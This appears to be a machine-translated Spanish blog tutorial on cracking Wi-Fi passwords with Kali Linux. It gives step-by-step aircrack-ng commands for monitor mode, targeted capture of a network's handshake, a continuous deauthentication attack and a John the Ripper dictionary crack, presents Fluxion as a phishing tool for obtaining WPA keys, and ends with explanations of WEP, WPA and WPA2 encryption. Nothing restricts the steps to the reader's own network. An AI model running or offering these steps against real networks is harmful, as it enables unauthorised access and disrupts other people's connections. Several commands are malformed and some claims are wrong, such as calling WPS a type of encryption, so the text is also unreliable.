La Pregunta Más Frecuente En Google Es Cómo Hackear Wifi Usando Kali Linux, Hackear wifi, Cómo Hackear Wifi Usando Kali Linux, etc. Pero En primer lugar Entender Lo que es Wifi & su cifrado.
Publicar Contenidos
- ¿Qué es Wi-Fi gratuita y Es Posible Hack?
- Herramientas utilizadas para Hackear la contraseña de WiFi En Kali-Linux
- Airmon-ng
- Aireplay-ng
- Airodump-ng
- Hccap
- John El Destripador
- Aircrack-ng
- Pasos Para Hackear WiFi Usando Kali-Linux o Con Cualquier Otro Sistema Operativo Debian Linux.
- Paso 1 :
- Paso 2:
- Paso 3:
- Paso 4:
- Paso 5:
- Paso 6:
- Herramienta de hacking Wifi :- Fluxion
- Cifrado inalámbrico
- Cifrado WEP
- Cómo funciona WEP
- Cifrado WPA
- Cómo funciona WPA
- Cifrado WPA 2
- WPA2-Personal
- WPA2-Enterprise
- Cómo funciona WPA2
¿Qué es Wi-Fi gratuita y Es Posible Hack?
Wi-Fi es el nombre de una popular tecnología de redes inalámbricas que utiliza ondas de radio para proporcionar conexiones de red e Internet de alta velocidad inalámbricas. Un error común es que el término Wi-Fi es la abreviatura de» fidelidad inalámbrica», sin embargo, este no es el caso. Wi-Fi es simplemente una frase de marca registrada que significa IEEE 802.11 x.
Cuando hablamos de hackeo de wifi desde cualquier dispositivo, la seguridad de ese wifi es lo más importante. Por lo tanto, cuando intentamos hackear wifi, es muy fácil descifrar o hackear la contraseña del sistema WPS disponible. WPS es uno de los tipos de cifrado, que se utiliza para proteger la red wifi, así que comencemos con un tutorial rápido.
Herramientas utilizadas para Hackear la contraseña de WiFi En Kali-Linux
Principalmente usamos el conjunto de herramientas incorporado de kali Linux para hackear la contraseña de wifi, que es lo siguiente:
- airmon-ng
- aireplay-ng
- airodump-ng
- hccap
- john el destripador
- aircrack-ng
Airmon-ng
Este script se puede utilizar para habilitar el modo de monitor en interfaces inalámbricas. También se puede usar para volver del modo de monitor al modo administrado. Al ingresar el comando airmon-ng sin parámetros, se mostrará el estado de las interfaces.
uso: airmon-ng < start / stop>< interfaz>o airmon-ng < check|check kill>
Aireplay-ng
Aireplay-ng se utiliza para inyectar fotogramas.
La función principal es generar tráfico para su uso posterior en aircrack-ng para descifrar las teclas WEP y WPA-PSK. Hay diferentes ataques que pueden causar desautenticaciones con el propósito de capturar datos de apretón de manos WPA, autenticaciones falsas, reproducción interactiva de paquetes, inyección de solicitud ARP hecha a mano y reinyección de solicitud ARP. Con la herramienta packetforge-ng es posible crear fotogramas arbitrarios.
La mayoría de los controladores deben estar parcheados para poder inyectar.
Airodump-ng
Airodump-ng se utiliza para capturar paquetes de fotogramas raw 802.11 y es particularmente adecuado para recopilar WEP IV (Vector de inicialización) con la intención de usarlos con aircrack-ng. Si tiene un receptor GPS conectado a la computadora, airodump-ng es capaz de registrar las coordenadas de los puntos de acceso encontrados.
Además, airodump-ng escribe varios archivos que contienen los detalles de todos los puntos de acceso y clientes vistos.
Hccap
Para convertir hashes de captura aircrack-ng en .hccapx usamos este comando.
John El Destripador
Para descifrar la contraseña, usamos el john el destripador en la etapa final. usamos esta herramienta para comparar los hashes con el diccionario de contraseñas. Hay muchas otras formas, pero probaremos una de ellas.
Aircrack-ng
Aircrack-ng es un conjunto completo de herramientas para evaluar la seguridad de la red WiFi.
Se centra en diferentes áreas de seguridad WiFi:
- Supervisión: Captura de paquetes y exportación de datos a archivos de texto para su posterior procesamiento por herramientas de terceros
- Ataque: Ataques de repetición, desautenticación, puntos de acceso falsos y otros a través de inyección de paquetes
- Pruebas: Comprobación de tarjetas WiFi y capacidades de controladores (captura e inyección)
- Cracking: WEP y WPA PSK (WPA 1 y 2)
Pasos Para Hackear WiFi Usando Kali-Linux o Con Cualquier Otro Sistema Operativo Debian Linux.
Todos los comandos con descripción se dan arriba, verifique que si tiene algún problema.
Paso 1 :
Primero, lleve su tarjeta de red al modo de monitor para monitorear las redes circundantes.
#airmon-ng start wlan1
#airodump-ng wlan1mon
Paso 2:
#airodump-ng –bssid 2C:55:D3:B1:35:0C -c 1 -w kalip300 wlan1mon
Paso 3:
#aireplay-ng -0 0-a 2C:55:D3:B1:35:0C wlan1mon
Después de capturar el archivo de apretón de manos con éxito, vemos algo como esto.
Paso 4:
#aircrack-ng kalip300-01.cap-j john
Paso 5:
# hccap2john john.hccap > wpa
Paso 6:
#john-wordlist* / root / Desktop / rockyou.txt / raíz / Escritorio / wpa
Y hackeamos con éxito la contraseña de wifi por kali linux
Herramienta de hacking Wifi :- Fluxion
Fluxion es una herramienta de auditoría de seguridad e investigación de ingeniería social. Es un remake de linset por vk496 con (con suerte) menos errores y más funcionalidad. El script intenta recuperar la clave WPA / WPA2 de un punto de acceso objetivo mediante un ataque de ingeniería social (phishing). Es compatible con la última versión de Kali (rolling). La configuración de los ataques de Fluxion es principalmente manual, pero el modo automático experimental maneja algunos de los parámetros de configuración de los ataques. Lea las preguntas frecuentes antes de solicitar problemas.
Cifrado inalámbrico
Cifrado WEP
La privacidad equivalente al cable (WEP) es un protocolo inalámbrico IEEE 802.11 que proporciona algoritmos de seguridad para la confidencialidad de los datos durante las transmisiones inalámbricas.
WEP utiliza un vector de inicialización(IV) de 24 bits para formar el cifrado de flujo RC4 para la confidencialidad, y la suma de verificación CRC-32 para la intergridad de la transmisión inalámbrica.
Cómo funciona WEP
- La suma de comprobación CRC-32 se utiliza para calcular un Valor de Comprobación de Integridad (ICV) de 32 bits para los datos, que, a su vez, se agrega al marco de datos.
2. Se agrega un número arbitrario de 24 bits conocido como Vector de inicialización (IV) a la clave WEP; la clave WEP y IV se denominan conjuntamente como semilla WEP.
3. La semilla WEP se utiliza como entrada al algoritmo RC4 para generar un flujo de claves (el flujo de claves se xorea en bits con la combinación de datos e ICV para producir los datos cifrados).
4. El campo IV (IV+PAD+KID) se agrega al texto cifrado para generar un marco MAC
Cifrado WPA
El acceso protegido Wi-Fi (WPA) es un método de cifrado de datos para WLAN Basado en 802.11 normas.
Es una instantánea de 802.11 i (en desarrollo) que proporciona un cifrado más sólido y habilita PSK para la autenticación EAP.
Cómo funciona WPA
La clave de cifrado temporal, la dirección de transmisión y el contador de secuencias TKIP (TSC) se utilizan como entrada al algoritmo RC4 para generar la trama de claves.
La Unidad de Datos de servicio MAC (MSDU) y la comprobación de intergridad de mensajes (MIC) se combinan mediante el algoritmo Michael.
La combinación de MSDU y MIC está fragmentada para generar la Unidad de Datos de Protocolo MAC (MPDU).
Se calcula un valor de comprobación de integridad (ICV) de 32 bits para el MPDU
La combinación de MPDU e ICV se realiza XORing a bits con Keysteam Para producir los datos cifrados
El IV se agrega a los datos cifrados para generar un marco MAC.
Cifrado WPA 2
WPA 2 proporciona a los usuarios empresariales y WI-FI una protección de datos y un control de acceso a la red más fuertes
Proporciona seguridad de grado gubernamental mediante la implementación del algoritmo de cifrado AES compatible con FIPS 140-2 del Instituto Nacional de Estándares y Tecnología (NIST).
WPA2-Personal
WPA2-Personal utiliza una contraseña de configuración (clave compartida previa) para proteger el acceso a la red no autorizado.
En modo PSK, cada dispositivo de red inalámbrica encripta el tráfico de red utilizando una clave de 128 bits que se deriva de una frase de contraseña de 8 a 63 caracteres ASCII.
WPA2-Enterprise
Incluye EAP o RADIUS para la autenticación centralizada de clientes mediante múltiples métodos de autenticación, como tarjetas de token, Kerberos, certificados, etc.
A los usuarios se les asignan credenciales de inicio de sesión mediante un servidor centralizado que deben presentar al conectarse a la red.
Cómo funciona WPA2
En la implementación CCMP de WPA2, los datos de encabezado Mac se utilizan para crear datos de autenticación adicionales (AAD).
Se utiliza un número de paquete secuenciado (PN) para construir nonce.
AAD, clave temporal y nonce junto con CCMP se utilizan para el cifrado de datos.
Un marco de MAC WPA2 se construye utilizando el encabezado de MAC, el encabezado CCMP, los datos cifrados y el micrófono cifrado
Puede que te hayas perdido Cómo Hackear el teléfono